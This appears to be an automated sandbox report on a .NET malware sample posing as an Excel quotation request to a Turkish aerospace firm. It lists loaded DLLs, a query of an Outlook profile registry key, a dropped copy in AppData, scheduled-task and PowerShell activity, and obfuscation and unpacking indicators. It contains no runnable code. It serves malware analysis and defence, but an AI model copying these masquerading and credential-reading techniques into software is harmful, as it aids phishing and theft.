Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static file information: File size 1083904 > 1048576

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x107e00

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: tsUY.pdbSHA256 source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, WheTgQY.exe.0.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2064388302.00000000071CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tsUY.pdb source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, WheTgQY.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, Form4.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: WheTgQY.exe.0.dr, Form4.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, XSC45GRfM1SSKcDUtG.cs	.Net Code: NSRsgw9l9W System.Reflection.Assembly.Load(byte[])
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, XSC45GRfM1SSKcDUtG.cs	.Net Code: NSRsgw9l9W System.Reflection.Assembly.Load(byte[])
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, XSC45GRfM1SSKcDUtG.cs	.Net Code: NSRsgw9l9W System.Reflection.Assembly.Load(byte[])
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.7520000.3.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static PE information: 0xF8B3CF14 [Thu Mar 23 05:05:24 2102 UTC]

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_077C5F6D push FFFFFF8Bh; iretd	0_2_077C5F6F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_046442AF push ebx; ret	3_2_046442DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_04640B35 push ebx; iretd	3_2_04640B42
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_06389390 push es; ret	9_2_063893A0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_063861D8 push es; ret	9_2_063861F0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111891E pushad ; iretd	10_2_0111891F
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_01118DDF push esp; iretd	10_2_01118DE0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_01118C2F pushfd ; iretd	10_2_01118C30
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D2DBE pushfd ; retf	10_2_055D2DC1
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA9C30 push esp; retf 027Ch	16_2_00DA9D55
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA25DD push esp; ret	16_2_00DA25DE
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA891E pushad ; iretd	16_2_00DA891F
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA8C2F pushfd ; iretd	16_2_00DA8C30
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA8DDF push esp; iretd	16_2_00DA8DE0

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Static PE information: section name: .text entropy: 6.857381673185179
Source: WheTgQY.exe.0.dr	Static PE information: section name: .text entropy: 6.857381673185179

Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, iCcs8YPAkCV0etVwL9.cs	High entropy of concatenated method names: 'u9Eu1uSUKS', 'X3HuMrkaVY', 'icNuufihhU', 'arluHY9ghP', 'cIduySfnxL', 'l65uhWNKbL', 'Dispose', 'BAYQZ1t4MJ', 'BbWQiYfbuN', 'XFxQLDy4ny'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, w90A1jnMoPf4Br66m9.cs	High entropy of concatenated method names: 'akjOZ8JEdN', 'i8fOLCtmSK', 'bmuO2uX4Ac', 'gJ52oNpuBj', 'S9T2z9HWtZ', 'uCqOlYakR3', 'roWOpJnnt4', 'S7BO579Se9', 'cI5OAMwHcY', 'GDFOsnv25Y'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, kJCm3784MdIr1AhtcP.cs	High entropy of concatenated method names: 'G2W1c740n3', 'O3W1aJlKYj', 't3d18yya1r', 'MtI1NC6O1O', 'O1v1mS75We', 'tR01eltXtb', 'XHL1Jkwqu0', 'xNH1tZp5PT', 'zer1TXwIZv', 'er51nCTVV2'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, ua2Hibx6ZJxZHLkI9Q.cs	High entropy of concatenated method names: 'ukwM4yHtXq', 'VgVMow7fbV', 'p48QlRXELa', 'lbxQp67g6E', 'ixAMEFs6jL', 'RGXMapE1pw', 'LHWM3sarus', 'GOsM8RR4Qa', 'rnlMNPfsBA', 'cCXMvbhd0K'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, Ygu3V0U7WENZpiB0Rh.cs	High entropy of concatenated method names: 'ySC2WsowAC', 'sv72ijQ4UK', 'eGw26iHp2Z', 'Ypf2OjGADx', 'eNo2RBphWP', 'OAY6rUpdZG', 'Eti6xFxQUJ', 'Gxl6Pqc8ii', 'X1p64IBIiN', 'NFC6fYdHgu'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, kkyuEWbsq1ZCQwxdXQ.cs	High entropy of concatenated method names: 'zc7i8Zj4b6', 'J9jiN6plHO', 'O7uivxlZUT', 'HF1iIqYIfH', 'AQ7irTOqon', 'O7pixwbwwj', 'O16iPqHe0Q', 'dWdi4wDe2E', 'm8lifZKbk2', 'xNjioFLKnM'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, aqyGOlBN8CM3jEJht0.cs	High entropy of concatenated method names: 'C1ZO06crM9', 'hJJOKy1ofn', 'NP5OgRhY8W', 'qXUOdgHUpH', 'X3AOYtaNYZ', 'SDOOSfbL5W', 'oZpO7d0KUZ', 'r91ObT03r6', 'PjVO9qS0fp', 'jE9OquDVuU'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, HMrRYozAd8caEdwjOH.cs	High entropy of concatenated method names: 'WvrjSreHnb', 'i7Ajb2r2lg', 'We2j9ZEbFP', 'rVHjUy3Ub6', 'nq4jmyiUp2', 'l4pjJXtA14', 'CaWjte75G4', 'crmjhs7Jwp', 'SUDj0x7yQZ', 'UgajKDqSCy'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, n3gWy0IkhZMqDGVwnx.cs	High entropy of concatenated method names: 'vZGMX9qPSP', 'RY7MCA1msi', 'ToString', 'I44MZZ3h44', 'SbSMi9MXS6', 'qp0MLC07TA', 'HXDM6rICkj', 'a8tM2Sn9Mj', 'j7QMOOdDXj', 'c5JMRN8yRt'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, y0d6quslK3NXUumYtW.cs	High entropy of concatenated method names: 'TZRpOkyuEW', 'dq1pRZCQwx', 'M2opXZfnX2', 'tKmpC2BciG', 'ry2p1v9ogu', 'QV0pF7WENZ', 'vdPcvCPNtSEk4NdTsN', 'jGwOYOKbQ04d0RXYdM', 'No9ppakQ4O', 'PVSpAlZNRk'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, UE0SrmplFAtSaQ8Im96.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y25jElbAGt', 'dXTjadMZq3', 'UYlj30vMIO', 'wETj8u5aD7', 'uMTjNyLJey', 'qbpjvkC6DO', 't8TjIAUrlm'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, SmAv1s3xG5ELJWCDwm.cs	High entropy of concatenated method names: 'oLJkbnXnEn', 'Okek9gavU2', 'fEEkUot656', 'D1MkmVcBnf', 'cA1kJ1Stss', 'TD0ktTZEEE', 'hFOknyDknn', 'GX6kw33NMO', 'JOvkcuG767', 'h4bkEQDMOi'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, MciGssqEFELlbQy2v9.cs	High entropy of concatenated method names: 'ipM6YWn7eh', 'ai3676Ti5d', 'djdLeVH5kx', 'wHpLJ1xKlC', 'cDGLt26Fjg', 'CSZLTskR5t', 'wusLn2968j', 'xkSLwFT82X', 'Yt7LBi5Pru', 'splLcw5ZPO'
